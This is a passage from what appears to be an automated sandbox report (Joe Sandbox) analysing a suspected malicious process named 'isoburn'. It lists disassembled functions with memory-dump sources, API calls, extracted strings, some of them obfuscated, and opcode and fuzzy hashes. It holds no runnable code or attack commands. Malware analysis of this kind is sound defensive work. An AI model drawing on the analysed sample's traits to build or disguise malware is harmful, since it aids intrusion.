                                                            • Instruction Fuzzy Hash: 85D05E71644208BBF650E6B99C07FA6328C5B447A8F844064BA48EB2C2EE69F44081B9
                                                            Function 00700D3B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00000111), ref: 00700D47
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                            • Instruction ID: dec9142f9c50cfd90a2d765069c8f045d5275a5e22fb8e5ecca0ee92e709fecb
                                                            • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                            • Instruction Fuzzy Hash: 6ED0A967B0001C7AAA0245C8ACC1DFEB76CEB84BA6F004263FF08E2080E6219D020AB1
                                                            Function 048F2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 498a4325a73e476f84a23142c180fef0ea69a50615c382497e321718fd007130
                                                            • Instruction ID: 430f7359fb4d64ee3200cd65d51fa7916e34d33e58070f8ba5a5845ceaf7445d
                                                            • Opcode Fuzzy Hash: 498a4325a73e476f84a23142c180fef0ea69a50615c382497e321718fd007130
                                                            • Instruction Fuzzy Hash: 61B09B719019C5C9FB11F7604A0C7177944ABD0705F15C571D3034685E4739D1D1E175

                                                            Non-executed Functions

                                                            Function 046904F8 Relevance: .1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2661629157.0000000004690000.00000040.00000800.00020000.00000000.sdmp, Offset: 04690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4690000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 472f6697d32d9fe9632113f7375ceada51e32632cf1883ff78d79e9ed814f6cc
                                                            • Instruction ID: ba56412558db22ec03a0817ed22637109e7a7928752b6a941bbd90a8ec8737b0
                                                            • Opcode Fuzzy Hash: 472f6697d32d9fe9632113f7375ceada51e32632cf1883ff78d79e9ed814f6cc
                                                            • Instruction Fuzzy Hash: FF41D571618F0D4FDBA8EF689081676B3E6FB59304F50052DD98AC3252FAB4FC468689
                                                            Function 0469DF59 Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2661629157.0000000004690000.00000040.00000800.00020000.00000000.sdmp, Offset: 04690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4690000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                            • API String ID: 0-3558027158
                                                            • Opcode ID: c3f6bb3eb17d3cf2440808d53dad2e0acb0b3211d8a5a46298aef4fe41500a8d
                                                            • Instruction ID: 022b6737340c0b3f45c6bd3141749e0f029e9c47595ce203a0175c784a2956e6
                                                            • Opcode Fuzzy Hash: c3f6bb3eb17d3cf2440808d53dad2e0acb0b3211d8a5a46298aef4fe41500a8d
                                                            • Instruction Fuzzy Hash: 669161F04082988AC7158F55A0652AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB85
                                                            Function 048F2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: e7006b3392f9be363b803d81d806856b50fd9972c2ad311eee45a750db9b80fe
                                                            • Instruction ID: 5b0e645b80f9db60a1adb5673b1bb6b998548622f31502b4ebad526e241ce785
                                                            • Opcode Fuzzy Hash: e7006b3392f9be363b803d81d806856b50fd9972c2ad311eee45a750db9b80fe
                                                            • Instruction Fuzzy Hash: 8D5116B2B0011ABFDB11DF988D8097FF7B8BB482047508B69E565D3A41E375FE009BA0
                                                            Function 04962410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: b61fbe95b877a86f16df179d5f0d67332c452e82858680e71a7025143868bb78
                                                            • Instruction ID: be1e795b813c29405da26b18c0155f0d578016bb6d3fa0cffef90318c09c01dd
                                                            • Opcode Fuzzy Hash: b61fbe95b877a86f16df179d5f0d67332c452e82858680e71a7025143868bb78
                                                            • Instruction Fuzzy Hash: 5F51C8757006456FDB30EF5CC89097EB7FD9B44204B4488BAE8D6D7681E6B4FA408760
                                                            Function 048E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04924725
                                                            • Execute=1, xrefs: 04924713
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04924655
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04924742
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 04924787
                                                            • ExecuteOptions, xrefs: 049246A0
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049246FC
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: 837907338a49f98858859675bbab2a1dcf906082d566ce296fa3e892a1a9d643
                                                            • Instruction ID: 2c3feea3ebf10631659d9feb33ce2bbfc455ba65d4481aad4f66b44bffa14a12
                                                            • Opcode Fuzzy Hash: 837907338a49f98858859675bbab2a1dcf906082d566ce296fa3e892a1a9d643
                                                            • Instruction Fuzzy Hash: 7C51EC31A00219BAFF10EEA5DC45FBA77A8EF46708F040AA9D505E7190E771BE45CF51
                                                            Function 04693BD9 Relevance: 12.6, Strings: 10, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2661629157.0000000004690000.00000040.00000800.00020000.00000000.sdmp, Offset: 04690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4690000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$^V^Y
                                                            • API String ID: 0-2612338985
                                                            • Opcode ID: 7bef59d175adce2c3e5606e9e343edfb177df956938c7e4c98610004d0ab4be2
                                                            • Instruction ID: bbb1b74207bfea0c175a561f58952d150940d27a5d88fd98a0579cdaa2ea46e4
                                                            • Opcode Fuzzy Hash: 7bef59d175adce2c3e5606e9e343edfb177df956938c7e4c98610004d0ab4be2
                                                            • Instruction Fuzzy Hash: CE2155B044474DDBCF14DF90D455ADEBBF1FF14348F8250A8E819AE202D77586A9CB89
                                                            Function 048FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: 0e2bdac009418781665e05f8005905f8993bd04d0bbcb62b04cb2cad521ca932
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: F981B070E152499FDF248E68CC917FEBBB2AF85350F184B1ADA61E7290D738B840CB51
                                                            Function 049620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$[$]:%u
                                                            • API String ID: 48624451-2819853543
                                                            • Opcode ID: 4f1a789e20b2d01d549b78e489b4daf90e82725f8219953196073900187012cb
                                                            • Instruction ID: 06b56bb778cefca34c6dba67e1b84aef56ed1e5ba6142db3287ebba64b6c1454
                                                            • Opcode Fuzzy Hash: 4f1a789e20b2d01d549b78e489b4daf90e82725f8219953196073900187012cb
                                                            • Instruction Fuzzy Hash: 2A215176E04119ABDB10EFA9DC40EEEBBFCEF54744F450566E905E3240E770EA019BA1
                                                            Function 048DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 0492031E
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049202BD
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049202E7
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: a8767f973108a21d31ad99f5dbc6dcb2c459e505c569f17b8399bdc7c4368b5f
                                                            • Instruction ID: 7953af803f4403d85d4c5356d7d85cafeb0f5f7686899512d50f6e9166ac7925
                                                            • Opcode Fuzzy Hash: a8767f973108a21d31ad99f5dbc6dcb2c459e505c569f17b8399bdc7c4368b5f
                                                            • Instruction Fuzzy Hash: DAE1AE306057419FD725CF28C984B6AB7E0AF88328F140B69E796CB2D1E774E845DB42
                                                            Function 048EBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 04927BAC
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04927B7F
                                                            • RTL: Resource at %p, xrefs: 04927B8E
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: 899676d55fc8c9f0bda00d89530d31e68ebeab1821b472be55bc18cc9204f83c
                                                            • Instruction ID: 9b32153c9d094219b37bbe6a03d1543365ffc8a0e43382a3abafc3a7b1cf26e0
                                                            • Opcode Fuzzy Hash: 899676d55fc8c9f0bda00d89530d31e68ebeab1821b472be55bc18cc9204f83c
                                                            • Instruction Fuzzy Hash: 4B41F4317017029FD724DE25C940B26B7E5EF8A715F000F2DE956DB680D731F8058B91
                                                            Function 048EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0492728C
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 049272C1
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04927294
                                                            • RTL: Resource at %p, xrefs: 049272A3
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: 3d339c65928cdea49ea93904d633ebc95de9abbccd0af834431271065e661488
                                                            • Instruction ID: 0a839670b6590146684e483424cb1be07afc643c68226f9ec2e7c3a9d623e063
                                                            • Opcode Fuzzy Hash: 3d339c65928cdea49ea93904d633ebc95de9abbccd0af834431271065e661488
                                                            • Instruction Fuzzy Hash: C4411031700616ABE720DE65CD41F66B7A5FB86718F100B28F955EB240DB31F852CBD1
                                                            Function 04962300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            • Opcode ID: b2cbe88f55c32e7767cdd299079e9ab520be970fe8712659361210dadec6a240
                                                            • Instruction ID: 1be764c2406a10ed49e3df29cecb6c2797016fdba19360d972b57d189622f4e8
                                                            • Opcode Fuzzy Hash: b2cbe88f55c32e7767cdd299079e9ab520be970fe8712659361210dadec6a240
                                                            • Instruction Fuzzy Hash: 12313772A002199FDB20DF2DDC40FEE77BCEB44754F8445A6E849E7240EB30BA559BA1
                                                            Function 048F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: f2f7acb229f5174ac424e90911e2224fabc9bb475d77cbfdf4ea930d12bb3ab2
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: 9291A571E0020A9BFB24DE69CC80ABEB7A5EF44724F544F1AEE55E72C0E770B9418721
                                                            Function 048B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: 68e12443a5dc2b8a820da470cbb4210098a5b1e50341e5b528dcfbcbd32e4275
                                                            • Instruction ID: 4de75638dfd7a95e7bcc419abf4c2bf77efe3e0823ab8283c88c806e74f44d76
                                                            • Opcode Fuzzy Hash: 68e12443a5dc2b8a820da470cbb4210098a5b1e50341e5b528dcfbcbd32e4275
                                                            • Instruction Fuzzy Hash: 8A813E71D002699FDB319B54CC44BDEB7B8AF04754F0046EAEA19B7290D770AE84DFA0
                                                            Function 0493CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0493CFBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: CallFilterFunc@8
                                                            • String ID: @$@4Qw@4Qw
                                                            • API String ID: 4062629308-2383119779
                                                            • Opcode ID: 29b01e2e3d17761f01da263980aa1415be5251c8af0ddabd39a7a4296134feee
                                                            • Instruction ID: d2f3f192ed778920665a4919498330a2529d8c763168dc0fae40da4bf40951e5
                                                            • Opcode Fuzzy Hash: 29b01e2e3d17761f01da263980aa1415be5251c8af0ddabd39a7a4296134feee
                                                            • Instruction Fuzzy Hash: 25419F71D04214DFDB219FA9D840AAEBBB9EF85B04F00463AE915EB250D774F805CBA1